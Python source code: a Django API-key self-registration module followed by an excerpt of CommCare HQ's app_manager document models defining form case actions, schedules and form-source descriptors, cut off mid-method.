                context['error'] = 'Key Already Activated'
            else:
                key_obj.status = 'A'
                key_obj.mark_for_update()
                key_obj.save()
        except self.key_model.DoesNotExist:
            context['error'] = 'Invalid Key'
        return render_to_response(self.registration_confirmed_template, context)
# Variant below: imports Django's real send_mail instead of the debugging stub.
import uuid
from django.conf import settings
from django.conf.urls.defaults import url
from django.core.mail import send_mail
from django.forms import ModelForm
from django.shortcuts import render_to_response
from django.template.loader import render_to_string
from locksmith.common import ApiBase, get_signature
from locksmith.auth.models import Key
class ApiAuth(ApiBase):
    """API-key self-registration endpoints (register + email confirmation)."""

    key_model = Key
    key_model_form = None
    require_confirmation = False
    registration_email_subject = 'API Registration'
    registration_email_from = settings.DEFAULT_FROM_EMAIL
    registration_email_template = 'locksmith/registration_email.txt'
    registration_template = 'locksmith/register.html'
    registration_complete_template = 'locksmith/registered.html'
    registration_confirmed_template = 'locksmith/confirmed.html'

    def get_key_model_form(self):
        """Build (once) and cache a ModelForm over ``key_model``."""
        if not self.key_model_form:
            model_cls = self.key_model

            class Form(ModelForm):
                class Meta:
                    model = model_cls
                    exclude = ('key', 'status', 'issued_on', 'pub_status')

            self.key_model_form = Form
        return self.key_model_form

    def verify_signature(self, post):
        """True when *post*'s signature matches get_signature() over our key."""
        expected = get_signature(post, settings.LOCKSMITH_SIGNING_KEY)
        return expected == post['signature']

    def get_urls(self):
        """Base API urls plus the registration/confirmation routes."""
        extra = [
            url(r'^register/$', self.register, name='api_registration'),
            url(r'^confirmkey/(?P<key>[0-9a-f]{32})/$', self.confirm_registration,
                name='api_confirm')]
        return super(ApiAuth, self).get_urls() + extra

    def register(self, request):
        """Render the signup form; on valid POST create and mail a new key."""
        if request.method != 'POST':
            blank_form = self.get_key_model_form()()
            return render_to_response(self.registration_template, {'form': blank_form})
        form = self.get_key_model_form()(request.POST)
        if not form.is_valid():
            # Re-render with the bound form so errors are shown.
            return render_to_response(self.registration_template, {'form': form})
        new_key = form.save(commit=False)
        new_key.key = uuid.uuid4().hex
        new_key.status = 'U' if self.require_confirmation else 'A'
        new_key.save()
        body = render_to_string(self.registration_email_template, {'key': new_key})
        send_mail(self.registration_email_subject, body,
                  self.registration_email_from, [new_key.email])
        return render_to_response(self.registration_complete_template, {'key': new_key})

    def confirm_registration(self, request, key):
        """Activate an unconfirmed key reached via the emailed link."""
        context = {}
        try:
            key_obj = self.key_model.objects.get(key=key)
        except self.key_model.DoesNotExist:
            context['error'] = 'Invalid Key'
        else:
            context['key'] = key_obj
            if key_obj.status == 'U':
                key_obj.status = 'A'
                key_obj.mark_for_update()
                key_obj.save()
            else:
                context['error'] = 'Key Already Activated'
        return render_to_response(self.registration_confirmed_template, context)
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import unicode_literals
import calendar
from distutils.version import LooseVersion
from itertools import chain
import tempfile
import os
import logging
import hashlib
import random
import json
import types
import re
import datetime
import uuid
from collections import defaultdict, namedtuple, Counter
from functools import wraps
from copy import deepcopy
from mimetypes import guess_type
from io import BytesIO
import qrcode
from django.utils.safestring import SafeBytes
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urljoin
from couchdbkit import MultipleResultsFound
import itertools
from lxml import etree
from django.core.cache import cache
from django.utils.translation import override, ugettext as _, ugettext
from django.utils.translation import ugettext_lazy
from django.db import models
from couchdbkit.exceptions import BadValueError
from corehq.apps.app_manager.app_schemas.case_properties import (
get_all_case_properties,
get_parent_type_map,
get_usercase_properties,
)
from corehq.apps.app_manager.detail_screen import PropertyXpathGenerator
from corehq.apps.integration.models import ApplicationIntegrationMixin
from corehq.apps.linked_domain.applications import get_master_app_version, get_latest_master_app_release
from corehq.apps.app_manager.helpers.validators import (
ApplicationBaseValidator,
ApplicationValidator,
FormValidator,
FormBaseValidator,
IndexedFormBaseValidator,
ModuleValidator,
ModuleBaseValidator,
AdvancedModuleValidator,
AdvancedFormValidator,
ReportModuleValidator,
ShadowFormValidator,
ShadowModuleValidator,
)
from corehq.apps.app_manager.suite_xml.utils import get_select_chain
from corehq.apps.app_manager.suite_xml.generator import SuiteGenerator, MediaSuiteGenerator
from corehq.apps.app_manager.xpath_validator import validate_xpath
from corehq.apps.data_dictionary.util import get_case_property_description_dict
from corehq.apps.linked_domain.exceptions import ActionNotPermitted
from corehq.apps.userreports.exceptions import ReportConfigurationNotFoundError
from corehq.apps.userreports.util import get_static_report_mapping
from corehq.apps.users.dbaccessors.couch_users import get_display_name_for_user_id
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.timer import TimingContext, time_method
from corehq.util.timezones.utils import get_timezone_for_domain
from dimagi.ext.couchdbkit import (
BooleanProperty,
DateTimeProperty,
DecimalProperty,
DictProperty,
Document,
DocumentSchema,
FloatProperty,
IntegerProperty,
ListProperty,
SchemaDictProperty,
SchemaListProperty,
SchemaProperty,
StringListProperty,
StringProperty,
)
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.urls import reverse
from django.template.loader import render_to_string
from couchdbkit import ResourceNotFound
from corehq import toggles, privileges
from corehq.blobs.mixin import BlobMixin, CODES
from corehq.const import USER_DATE_FORMAT, USER_TIME_FORMAT
from corehq.apps.app_manager.feature_support import CommCareFeatureSupportMixin
from corehq.apps.app_manager.tasks import prune_auto_generated_builds
from corehq.util.quickcache import quickcache
from corehq.util.soft_assert import soft_assert
from corehq.util.timezones.conversions import ServerTime
from dimagi.utils.couch import CriticalSection
from django_prbac.exceptions import PermissionDenied
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.app_manager.commcare_settings import check_condition
from corehq.apps.app_manager.const import *
from corehq.apps.app_manager.const import USERCASE_TYPE
from corehq.apps.app_manager.xpath import (
dot_interpolate,
interpolate_xpath,
)
from corehq.apps.builds.utils import get_default_build_spec
from dimagi.utils.couch.undo import DeleteRecord, DELETED_SUFFIX
from dimagi.utils.dates import DateSpan
from memoized import memoized
from dimagi.utils.web import get_url_base, parse_int
from corehq.util import bitly
from corehq.util import view_utils
from corehq.apps.appstore.models import SnapshotMixin
from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import (
ApplicationMediaMixin,
CommCareMultimedia,
FormMediaMixin,
ModuleMediaMixin,
)
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
save_xform,
is_usercase_in_use,
actions_use_usercase,
update_form_unique_ids,
get_correct_app_class,
get_and_assert_practice_user_in_domain,
LatestAppInfo,
update_report_module_ids,
module_offers_search,
get_latest_enabled_build_for_profile,
get_latest_enabled_versions_per_profile,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from corehq.apps.app_manager.exceptions import (
AppEditingError,
FormNotFoundException,
IncompatibleFormTypeException,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
XFormValidationFailed,
PracticeUserException)
from corehq.apps.reports.daterange import get_daterange_start_end_dates, get_simple_dateranges
from jsonpath_rw import jsonpath, parse
import six
from six.moves import filter
from six.moves import range
from six.moves import map
from io import open
# Detail screen variants a suite can declare for cases and referrals.
DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']
# Separator between field name and format in detail column field specs.
FIELD_SEPARATOR = ':'
# Matches top-level .xml attachment names (no '/' in the name).
ATTACHMENT_REGEX = r'[^/]*\.xml'
# App-profile logo slug -> CommCare Android brand-banner property name.
ANDROID_LOGO_PROPERTY_MAPPING = {
    'hq_logo_android_home': 'brand-banner-home',
    'hq_logo_android_login': 'brand-banner-login',
    'hq_logo_android_demo': 'brand-banner-home-demo',
}
# Sentinel values meaning "use the latest apk / app version".
LATEST_APK_VALUE = 'latest'
LATEST_APP_VALUE = 0
_soft_assert = soft_assert(to="{}@{}.com".format('npellegrino', 'dimagi'), exponential_backoff=True)
def jsonpath_update(datum_context, value):
    """Assign *value* at the location described by *datum_context*.

    ``datum_context`` is a jsonpath datum; the write happens on its parent
    container under the context's final field name.
    """
    target_field = datum_context.path.fields[0]
    container = jsonpath.Parent().find(datum_context)[0]
    container.value[target_field] = value
# Every jsonpath expression registered through FormIdProperty() is kept
# here so that, when an app is copied, all stored form-ID references can
# be rewritten to the new IDs.
form_id_references = []


def FormIdProperty(expression, **kwargs):
    """Create a ``StringProperty`` that points at a form ID.

    Form IDs change when apps are copied, so the parsed path expression is
    remembered in ``form_id_references`` for later fix-up.

    :param expression: jsonpath expression that can be used to find the field
    :param kwargs: arguments to be passed to the underlying StringProperty
    """
    parsed = parse(expression)
    assert isinstance(parsed, jsonpath.Child), "only child path expressions are supported"
    assert len(parsed.right.fields) == 1, 'path expression can only reference a single field'
    form_id_references.append(parsed)
    return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
def app_template_dir(slug):
    """Filesystem path of the bundled template app named *slug*."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'static', 'app_manager', 'template_apps', slug)
@memoized
def load_app_template(slug):
    """Load (and cache, via @memoized) the app.json for template app *slug*."""
    template_path = os.path.join(app_template_dir(slug), 'app.json')
    with open(template_path) as f:
        return json.load(f)
class IndexedSchema(DocumentSchema):
    """
    Abstract class.
    Meant for documents that appear in a list within another document
    and need to know their own position within that list.
    """
    def with_id(self, i, parent):
        # Stamp this document with its list position and owning document,
        # returning self so calls can chain (used by Getter below).
        self._i = i
        self._parent = parent
        return self
    @property
    def id(self):
        # Position within the parent's list, as set by with_id().
        return self._i
    def __eq__(self, other):
        # Equal when both are IndexedSchema at the same position in the
        # same parent.  NOTE(review): defining __eq__ without __hash__
        # leaves instances unhashable on Python 3 unless a base class
        # restores __hash__ -- confirm against DocumentSchema.
        return (
            other and isinstance(other, IndexedSchema)
            and (self.id == other.id)
            and (self._parent == other._parent)
        )
    class Getter(object):
        # Descriptor used as e.g. `get_subcases = IndexedSchema.Getter('subcases')`:
        # calling the resulting bound method yields each list item already
        # stamped with its index via with_id().
        def __init__(self, attr):
            self.attr = attr
        def __call__(self, instance):
            items = getattr(instance, self.attr)
            l = len(items)
            for i, item in enumerate(items):
                # i % l == i here since i < l; kept exactly as written.
                yield item.with_id(i % l, instance)
        def __get__(self, instance, owner):
            # thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
            # this makes Getter('foo') act like a bound method
            return types.MethodType(self, instance)
class FormActionCondition(DocumentSchema):
    """
    The condition under which to open/update/close a case/referral
    Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
    in which case the action takes place if question has answer answer,
    or {'type': 'always'} in which case the action always takes place.
    """
    # 'never' (the default) disables the action entirely.
    type = StringProperty(choices=["if", "always", "never"], default="never")
    # Question path and expected answer; only meaningful when type == 'if'.
    question = StringProperty()
    answer = StringProperty()
    # How the answer is compared for 'if' conditions.
    operator = StringProperty(choices=['=', 'selected', 'boolean_true'], default='=')
    def is_active(self):
        # The action runs when conditional ('if') or unconditional ('always').
        return self.type in ('if', 'always')
class FormAction(DocumentSchema):
    """
    Corresponds to Case XML
    """
    condition = SchemaProperty(FormActionCondition)

    def is_active(self):
        """True when this action's condition lets it run ('if'/'always')."""
        return self.condition.is_active()

    @classmethod
    def get_action_paths(cls, action):
        """Yield every question path referenced by *action*.

        Includes the condition's question (for 'if' conditions) plus the
        path from every (property, path) pair of get_action_properties().
        """
        if action.condition.type == 'if':
            yield action.condition.question
        for __, path in cls.get_action_properties(action):
            yield path

    @classmethod
    def get_action_properties(cls, action):
        """Yield ``(case_property_name, question_path)`` pairs for *action*.

        Only inspects the schema properties the concrete action class
        actually declares (name_path / case_name / external_id / update /
        case_properties / preload).
        """
        # Fixed: this classmethod's first parameter was misleadingly named
        # `self`; it receives the class.  No behavior change.
        action_properties = action.properties()
        if 'name_path' in action_properties and action.name_path:
            yield 'name', action.name_path
        if 'case_name' in action_properties:
            yield 'name', action.case_name
        if 'external_id' in action_properties and action.external_id:
            yield 'external_id', action.external_id
        if 'update' in action_properties:
            for name, path in action.update.items():
                yield name, path
        if 'case_properties' in action_properties:
            for name, path in action.case_properties.items():
                yield name, path
        if 'preload' in action_properties:
            # preload maps question path -> property name, hence the swap.
            for path, name in action.preload.items():
                yield name, path
class UpdateCaseAction(FormAction):
    """Writes case properties: maps case property name -> question path."""
    update = DictProperty()
class PreloadAction(FormAction):
    """Loads case values into the form: maps question path -> case property."""
    preload = DictProperty()
    def is_active(self):
        # Active only when there is at least one property to preload.
        return bool(self.preload)
class UpdateReferralAction(FormAction):
    """Updates a referral, optionally scheduling a follow-up date."""
    # Question/XPath reference evaluating to the follow-up date.
    followup_date = StringProperty()
    def get_followup_date(self):
        """Return an XPath expression for the follow-up date: the configured
        date when it is not in the past, otherwise two days from today."""
        if self.followup_date:
            return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
                followup_date=self.followup_date,
            )
        # followup_date is falsy here, so this always yields the default.
        return self.followup_date or "date(today() + 2)"
class OpenReferralAction(UpdateReferralAction):
    """Opens a referral; its name comes from the question at ``name_path``."""
    name_path = StringProperty()
class OpenCaseAction(FormAction):
    """Opens a new case, named from the question at ``name_path``."""
    name_path = StringProperty()
    external_id = StringProperty()
class OpenSubCaseAction(FormAction, IndexedSchema):
    """Opens a child/extension case from within a form, optionally once per
    instance of a repeat group."""
    case_type = StringProperty()
    case_name = StringProperty()
    reference_id = StringProperty()
    # case property name -> question path
    case_properties = DictProperty()
    # Path of the repeat group the subcase is created inside, if any.
    repeat_context = StringProperty()
    # relationship = "child" for index to a parent case (default)
    # relationship = "extension" for index to a host case
    relationship = StringProperty(choices=['child', 'extension'], default='child')
    close_condition = SchemaProperty(FormActionCondition)
    @property
    def form_element_name(self):
        # XML element name for this subcase block; `id` is the list index
        # supplied by IndexedSchema.
        return 'subcase_{}'.format(self.id)
class FormActions(DocumentSchema):
    """Container for every case/referral action configured on a form."""
    open_case = SchemaProperty(OpenCaseAction)
    update_case = SchemaProperty(UpdateCaseAction)
    close_case = SchemaProperty(FormAction)
    open_referral = SchemaProperty(OpenReferralAction)
    update_referral = SchemaProperty(UpdateReferralAction)
    close_referral = SchemaProperty(FormAction)
    case_preload = SchemaProperty(PreloadAction)
    referral_preload = SchemaProperty(PreloadAction)
    load_from_form = SchemaProperty(PreloadAction) # DEPRECATED
    usercase_update = SchemaProperty(UpdateCaseAction)
    usercase_preload = SchemaProperty(PreloadAction)
    subcases = SchemaListProperty(OpenSubCaseAction)
    # Yields each subcase stamped with its list index (see IndexedSchema.Getter).
    get_subcases = IndexedSchema.Getter('subcases')
    def all_property_names(self):
        """Set of case property names this form reads or writes (update,
        preload, and all subcases)."""
        names = set()
        names.update(list(self.update_case.update.keys()))
        names.update(list(self.case_preload.preload.values()))
        for subcase in self.subcases:
            names.update(list(subcase.case_properties.keys()))
        return names
    def count_subcases_per_repeat_context(self):
        # Counter mapping repeat_context -> number of subcases opened there.
        return Counter([action.repeat_context for action in self.subcases])
class CaseIndex(DocumentSchema):
    """One index entry relating a case to another case."""
    tag = StringProperty()
    # Index name on the indexing case; 'parent' is the conventional default.
    reference_id = StringProperty(default='parent')
    relationship = StringProperty(choices=['child', 'extension', 'question'], default='child')
    # if relationship is 'question', this is the question path
    # question's response must be either "child" or "extension"
    relationship_question = StringProperty(default='')
class AdvancedAction(IndexedSchema):
    """Base schema for advanced-module case actions."""
    case_type = StringProperty()
    case_tag = StringProperty()
    # case property name -> question path
    case_properties = DictProperty()
    # case_indices = NotImplemented
    close_condition = SchemaProperty(FormActionCondition)
    # Restore value-based equality from DocumentSchema; IndexedSchema
    # overrides __eq__ with position-based comparison.
    __eq__ = DocumentSchema.__eq__
    def get_paths(self):
        """Yield every question path this action references."""
        for path in self.case_properties.values():
            yield path
        if self.close_condition.type == 'if':
            yield self.close_condition.question
    def get_property_names(self):
        """Set of case property names written by this action."""
        return set(self.case_properties.keys())
    @property
    def is_subcase(self):
        # Relies on `case_indices`, which concrete subclasses must provide
        # (see the NotImplemented marker above).
        return bool(self.case_indices)
    @property
    def form_element_name(self):
        # XML element name for this action's block in the form body.
        return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
    """
    Configuration for auto-selecting a case.
    Attributes:
        value_source    Reference to the source of the value. For mode = fixture,
                        this represents the FixtureDataType ID. For mode = case
                        this represents the 'case_tag' for the case.
                        The modes 'user' and 'raw' don't require a value_source.
        value_key       The actual field that contains the case ID. Can be a case
                        index or a user data key or a fixture field name or the raw
                        xpath expression.
    """
    # AUTO_SELECT_* constants come from the app_manager const module
    # (star-imported at the top of this file).
    mode = StringProperty(choices=[AUTO_SELECT_USER,
                                   AUTO_SELECT_FIXTURE,
                                   AUTO_SELECT_CASE,
                                   AUTO_SELECT_USERCASE,
                                   AUTO_SELECT_RAW])
    value_source = StringProperty()
    value_key = StringProperty(required=True)
class LoadCaseFromFixture(DocumentSchema):
    """
    fixture_nodeset: nodeset that returns the fixture options to display
    fixture_tag: id of session datum where the result of user selection will be stored
    fixture_variable: value from the fixture to store from the selection
    auto_select_fixture: boolean to autoselect the value if the nodeset only returns 1 result
    case_property: case property to filter on
    arbitrary_datum_*: adds an arbitrary datum with function before the action
    """
    fixture_nodeset = StringProperty()
    fixture_tag = StringProperty()
    fixture_variable = StringProperty()
    auto_select_fixture = BooleanProperty(default=False)
    case_property = StringProperty(default='')
    # NOTE(review): both `auto_select` and `auto_select_fixture` exist; the
    # docstring only describes the latter -- confirm which consumers read
    # `auto_select` before consolidating.
    auto_select = BooleanProperty(default=False)
    arbitrary_datum_id = StringProperty()
    arbitrary_datum_function = StringProperty()
class LoadUpdateAction(AdvancedAction):
    """
    details_module:           Use the case list configuration from this module to
                              show the cases.
    preload:                  Value from the case to load into the form. Keys are
                              question paths, values are case properties.
    auto_select:              Configuration for auto-selecting the case
    load_case_from_fixture:   Configuration for loading a case using fixture data
    show_product_stock:       If True list the product stock using the module's
                              Product List configuration.
    product_program:          Only show products for this CommCare Supply program.
    case_index:               Used when a case should be created/updated as a child
                              or extension case of another case.
    """
    details_module = StringProperty()
    preload = DictProperty()
    auto_select = SchemaProperty(AutoSelectCase, default=None)
    load_case_from_fixture = SchemaProperty(LoadCaseFromFixture, default=None)
    show_product_stock = BooleanProperty(default=False)
    product_program = StringProperty()
    case_index = SchemaProperty(CaseIndex)

    @property
    def case_indices(self):
        # Allows us to ducktype AdvancedOpenCaseAction
        return [self.case_index] if self.case_index.tag else []

    @case_indices.setter
    def case_indices(self, value):
        # A load/update action can only ever point at a single parent case.
        if len(value) > 1:
            raise ValueError('A LoadUpdateAction cannot have more than one case index')
        if value:
            self.case_index = value[0]
        else:
            self.case_index = CaseIndex()

    @case_indices.deleter
    def case_indices(self):
        self.case_index = CaseIndex()

    def get_paths(self):
        # Parent class paths plus the question paths preloaded from the case.
        for path in super(LoadUpdateAction, self).get_paths():
            yield path

        for path in self.preload.keys():
            yield path

    def get_property_names(self):
        # Parent class property names plus those read via preload.
        names = super(LoadUpdateAction, self).get_property_names()
        names.update(list(self.preload.values()))
        return names

    @property
    def case_session_var(self):
        # Session datum id under which the selected case id is stored.
        return 'case_id_{0}'.format(self.case_tag)

    @classmethod
    def wrap(cls, data):
        # Lazy migration: old documents stored parent linkage as flat keys
        # (parent_tag / parent_reference_id / relationship); fold them into
        # the case_index sub-document.
        if 'parent_tag' in data:
            if data['parent_tag']:
                data['case_index'] = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
    """Advanced-form action that opens a new case, optionally as a
    child/extension of one or more parent cases (``case_indices``)."""
    # question path whose answer becomes the new case's name
    name_path = StringProperty()
    # repeat group context, when cases are opened from inside a repeat
    repeat_context = StringProperty()
    case_indices = SchemaListProperty(CaseIndex)

    open_condition = SchemaProperty(FormActionCondition)

    def get_paths(self):
        # Parent class paths, the case-name question, and the open condition's
        # question when opening is conditional ('if').
        for path in super(AdvancedOpenCaseAction, self).get_paths():
            yield path

        yield self.name_path

        if self.open_condition.type == 'if':
            yield self.open_condition.question

    @property
    def case_session_var(self):
        # Session datum id under which the new case id is stored.
        return 'case_id_new_{}_{}'.format(self.case_type, self.id)

    @classmethod
    def wrap(cls, data):
        # Lazy migration: fold legacy flat parent keys into a case_indices
        # entry, appending when a list already exists.
        if 'parent_tag' in data:
            if data['parent_tag']:
                index = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
                if hasattr(data.get('case_indices'), 'append'):
                    data['case_indices'].append(index)
                else:
                    data['case_indices'] = [index]
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
    """Container for the case actions configured on an advanced form.

    ``load_update_cases`` load (and optionally update) existing cases;
    ``open_cases`` create new ones.
    """
    load_update_cases = SchemaListProperty(LoadUpdateAction)

    open_cases = SchemaListProperty(AdvancedOpenCaseAction)

    get_load_update_actions = IndexedSchema.Getter('load_update_cases')
    get_open_actions = IndexedSchema.Getter('open_cases')

    def get_all_actions(self):
        """All actions: load/update actions first, then open actions."""
        return itertools.chain(self.get_load_update_actions(), self.get_open_actions())

    def get_subcase_actions(self):
        """Actions that index another case (child/extension relationships)."""
        return (a for a in self.get_all_actions() if a.case_indices)

    def get_open_subcase_actions(self, parent_case_type=None):
        """Open actions that create a child/extension case.

        When ``parent_case_type`` is given, only yield actions whose indexed
        parent action has that case type.
        """
        for action in self.open_cases:
            if action.case_indices:
                if not parent_case_type:
                    yield action
                else:
                    if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
                           for case_index in action.case_indices):
                        yield action

    def get_case_tags(self):
        """Yield the case tag of every action."""
        for action in self.get_all_actions():
            yield action.case_tag

    def get_action_from_tag(self, tag):
        """Return the action with the given case tag, or None."""
        return self.actions_meta_by_tag.get(tag, {}).get('action', None)

    @property
    def actions_meta_by_tag(self):
        return self._action_meta()['by_tag']

    @property
    def actions_meta_by_parent_tag(self):
        return self._action_meta()['by_parent_tag']

    @property
    def auto_select_actions(self):
        return self._action_meta()['by_auto_select_mode']

    @memoized
    def _action_meta(self):
        """Build lookup tables over all actions: by case tag, by parent tag,
        and (for load actions) by auto-select mode."""
        meta = {
            'by_tag': {},
            'by_parent_tag': {},
            'by_auto_select_mode': {
                AUTO_SELECT_USER: [],
                AUTO_SELECT_CASE: [],
                AUTO_SELECT_FIXTURE: [],
                AUTO_SELECT_USERCASE: [],
                AUTO_SELECT_RAW: [],
            }
        }

        def add_actions(action_type, action_list):
            # NOTE: parameter renamed from ``type`` to avoid shadowing the builtin.
            for action in action_list:
                meta['by_tag'][action.case_tag] = {
                    'type': action_type,
                    'action': action
                }
                for parent in action.case_indices:
                    meta['by_parent_tag'][parent.tag] = {
                        'type': action_type,
                        'action': action
                    }
                if action_type == 'load' and action.auto_select and action.auto_select.mode:
                    meta['by_auto_select_mode'][action.auto_select.mode].append(action)

        add_actions('load', self.get_load_update_actions())
        add_actions('open', self.get_open_actions())

        return meta

    def count_subcases_per_repeat_context(self):
        """Counter of repeat contexts over all open-subcase actions."""
        return Counter([action.repeat_context for action in self.get_open_subcase_actions()])
class FormSource(object):
    """Descriptor exposing a form's XForm XML.

    The XML is stored as an app attachment named ``<unique_id>.xml`` and is
    fetched/put lazily through the owning app.
    """

    def __get__(self, form, form_cls):
        if not form:
            # accessed on the class, not an instance
            return self
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id

        # for backwards compatibility of really old apps
        try:
            old_contents = form['contents']
        except AttributeError:
            pass
        else:
            # migrate inline 'contents' into an attachment, then drop it
            app.lazy_put_attachment(old_contents.encode('utf-8'), filename)
            del form['contents']

        if not app.has_attachment(filename):
            source = ''
        else:
            source = app.lazy_fetch_attachment(filename)
            if isinstance(source, bytes):
                source = source.decode('utf-8')
            else:
                # attachments are expected to come back as bytes; flag anything else
                _soft_assert(False, type(source))

        return source

    def __set__(self, form, value):
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id
        if isinstance(value, six.text_type):
            value = value.encode('utf-8')
        else:
            # value should be text; flag unexpected types but store as-is
            _soft_assert(False, type(value))
        app.lazy_put_attachment(value, filename)
        form.clear_validation_cache()
        try:
            # keep the cached xmlns in sync with the new source
            form.xmlns = form.wrapped_xform().data_node.tag_xmlns
        except Exception:
            form.xmlns = None
class CachedStringProperty(object):
    """Descriptor that stores a string in the shared cache.

    ``key`` is a callable that maps the owning instance to its cache key.
    """

    def __init__(self, key):
        self.get_key = key

    def __get__(self, instance, owner):
        cache_key = self.get_key(instance)
        return self.get(cache_key)

    def __set__(self, instance, value):
        cache_key = self.get_key(instance)
        self.set(cache_key, value)

    @classmethod
    def get(cls, key):
        return cache.get(key)

    @classmethod
    def set(cls, key, value):
        # cache for 7 days
        cache.set(key, value, 7 * 24 * 60 * 60)
class ScheduleVisit(IndexedSchema):
    """
    due:         Days after the anchor date that this visit is due
    starts:      Days before the due date that this visit is valid from
    expires:     Days after the due date that this visit is valid until (optional)

    repeats:     Whether this is a repeat visit (one per form allowed)
    increment:   Days after the last visit that the repeat visit occurs
    """
    due = IntegerProperty()
    starts = IntegerProperty()
    expires = IntegerProperty()
    repeats = BooleanProperty(default=False)
    increment = IntegerProperty()

    @property
    def id(self):
        """Visits are 1-based indexed"""
        # IndexedSchema numbers items from 0; shift for display/reference.
        _id = super(ScheduleVisit, self).id
        return _id + 1
class FormDatum(DocumentSchema):
    """A session datum passed to a linked form: name plus xpath expression."""
    name = StringProperty()
    xpath = StringProperty()
class FormLink(DocumentSchema):
    """
    xpath:   xpath condition that must be true in order to open next form
    form_id: id of next form to open
    datums:  session datums to pass along to the next form
    """
    xpath = StringProperty()
    form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
    datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
    """
    enabled:               Whether this schedule is currently active
    starts:                Days after the anchor date that this schedule starts
    expires:               Days after the anchor date that this schedule expires (optional)
    visits:                List of visits in this schedule
    allow_unscheduled:     Allow unscheduled visits in this schedule
    transition_condition:  Condition under which we transition to the next phase
    termination_condition: Condition under which we terminate the whole schedule
    """
    enabled = BooleanProperty(default=True)

    starts = IntegerProperty()
    expires = IntegerProperty()
    allow_unscheduled = BooleanProperty(default=False)
    visits = SchemaListProperty(ScheduleVisit)
    get_visits = IndexedSchema.Getter('visits')

    transition_condition = SchemaProperty(FormActionCondition)
    termination_condition = SchemaProperty(FormActionCondition)
class CustomAssertion(DocumentSchema):
    """Custom assertions to add to the assertions block

    test: The actual assertion to run
    text: Message shown when the assertion fails; presumably keyed by
          language code (NOTE(review): docstring previously described a
          nonexistent ``locale_id`` property)
    """
    test = StringProperty(required=True)
    text = DictProperty(StringProperty)
class CustomInstance(DocumentSchema):
    """Custom instances to add to the instance block

    instance_id: The ID of the instance
    instance_path: The path where the instance can be found
    """
    instance_id = StringProperty(required=True)
    instance_path = StringProperty(required=True)
class CommentMixin(DocumentSchema):
    """
    Documentation comment for app builders and maintainers
    """
    comment = StringProperty(default='')

    @property
    def short_comment(self):
        """
        Trim comment to 500 chars (about 100 words)
        """
        full_text = self.comment
        if len(full_text) <= 500:
            return full_text
        return full_text[:497] + '...'
class CaseLoadReference(DocumentSchema):
    """
    This is the schema for a load reference that is used in validation and expected
    to be worked with when using `CaseReferences`. The format is different from the
    dict of:
    {
        'path': ['list', 'of', 'properties']
    }
    That is stored on the model and expected in Vellum, but as we add more information
    (like case types) to the load model this format will be easier to extend.
    """
    _allow_dynamic_properties = False
    # question path in the form
    path = StringProperty()
    # case property names loaded at that path
    properties = ListProperty(six.text_type)
class CaseSaveReference(DocumentSchema):
    """
    This is the schema for what Vellum writes to HQ and what is expected to be stored on the
    model (reference by a dict where the keys are paths).
    """
    _allow_dynamic_properties = False
    case_type = StringProperty()
    properties = ListProperty(six.text_type)
    # whether this save also opens / closes the case
    create = BooleanProperty(default=False)
    close = BooleanProperty(default=False)
class CaseSaveReferenceWithPath(CaseSaveReference):
    """
    Like CaseLoadReference, this is the model that is expected to be worked with as it
    contains the complete information about the reference in a single place.
    """
    # question path in the form where this save occurs
    path = StringProperty()
class CaseReferences(DocumentSchema):
    """
    The case references associated with a form. This is dependent on Vellum's API that sends
    case references to HQ.

    load: is a dict of question paths to lists of properties (see `CaseLoadReference`),
    save: is a dict of question paths to `CaseSaveReference` objects.

    The intention is that all usage of the objects goes through the `get_load_references` and
    `get_save_references` helper functions.
    """
    _allow_dynamic_properties = False
    load = DictProperty()
    save = SchemaDictProperty(CaseSaveReference)

    def validate(self, required=True):
        # NOTE(review): ``required`` is accepted for signature compatibility
        # but not forwarded to super().validate()
        super(CaseReferences, self).validate()
        # call this method to force validation to run on the other referenced types
        # since load is not a defined schema (yet)
        list(self.get_load_references())

    def get_load_references(self):
        """
        Returns a generator of `CaseLoadReference` objects containing all the load references.
        """
